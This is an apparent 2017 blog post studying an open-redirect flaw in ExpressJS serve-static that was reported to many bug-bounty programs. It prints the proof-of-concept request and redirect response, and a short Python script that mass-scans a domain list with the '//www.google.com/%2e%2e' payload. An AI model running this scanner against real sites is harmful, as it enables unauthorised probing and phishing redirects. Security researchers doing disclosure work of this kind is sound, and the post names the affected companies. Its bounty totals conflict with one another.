Open Redirection: A Case Study

One open redirection bug exploited across different bug bounties to earn $4274.

Automating Open Redirection Bugs: A Case Study

I noticed while browsing HackerOne public disclosures, that a user, bobrov had reported many of the same open redirection vulnerabilities to different companies. There is a list of the companies that were affected, with their HackerOne public disclosure links at the bottom of this post.

Since all of these were the same bug, let’s look at a report and determine what the cause was by reading the reports and seeing if there is any more information. Most reports are not very helpful for determining the cause, partially because bobrov’s submission is fairly sparse of information. However, in the Uber report, bobrov links a GitHub issue for the expressjs/serve-static repository.

In this issue, pierre-elie gives the proof of concept for an open redirect (which was reported by bobrov through BugCrowd!). The GET request looks like the following (note the User-Agent field doesn’t matter here):

GET //www.google.com/%2e%2e HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive

And the response which does the redirection:

HTTP/1.1 303 See Other
X-Powered-By: Express
Content-Type: text/html; charset=utf-8
Location: //www.google.com/%2e%2e/
Date: Sat, 03 Jan 2015 01:13:49 GMT
Connection: keep-alive
Transfer-Encoding: chunked

Redirecting to <a href="//www.google.com/%2e%2e/">//www.google.com/%2e%2e/</a>

So by passing an extra backslash and some escaping characters, one can redirect to any domain if the webserver is running this version of ExpressJS.

Let’s automate it and make money

First, we need a list of websites that we want to test. One can manually go through the bug bounty programs and add their inscope websites there. Once a list is made we can start to automate the following steps:

  1. Navigate to URL like http://example.com//www.google.com/%2e%2e
  2. Get response from server to determine if it is redirected with Location header
  3. If 2 is true, then we print out the URL and report it

The code

Assuming the company domains are in a text file the code to automate this will look like the following:

import requests

payload = "//www.google.com/%2e%2e"

with open("bug_bounty.txt", "r") as f:
    for domain in f:
        domain = domain.strip()

        r = requests.get("http://" + domain + payload, allow_redirects=False)
        if "Location" in r.headers and r.headers["Location"] == payload:
            print domain + payload

The earnings: $1814 (found publicly on HackerOne, though bobrov says $4271), HackerOne reputation and Bugcrowd Kudos. Not bad for a 11 line Python script.

Companies Affected:

  1. Zaption
  2. c2fo
  3. zopim
  4. qiwi
  5. signwithenvoy
  6. mail.ru
  7. skyliner.io
  8. uber.com
  9. shopify.com
  10. keybase.io
  11. trello.com
Written on January 10, 2017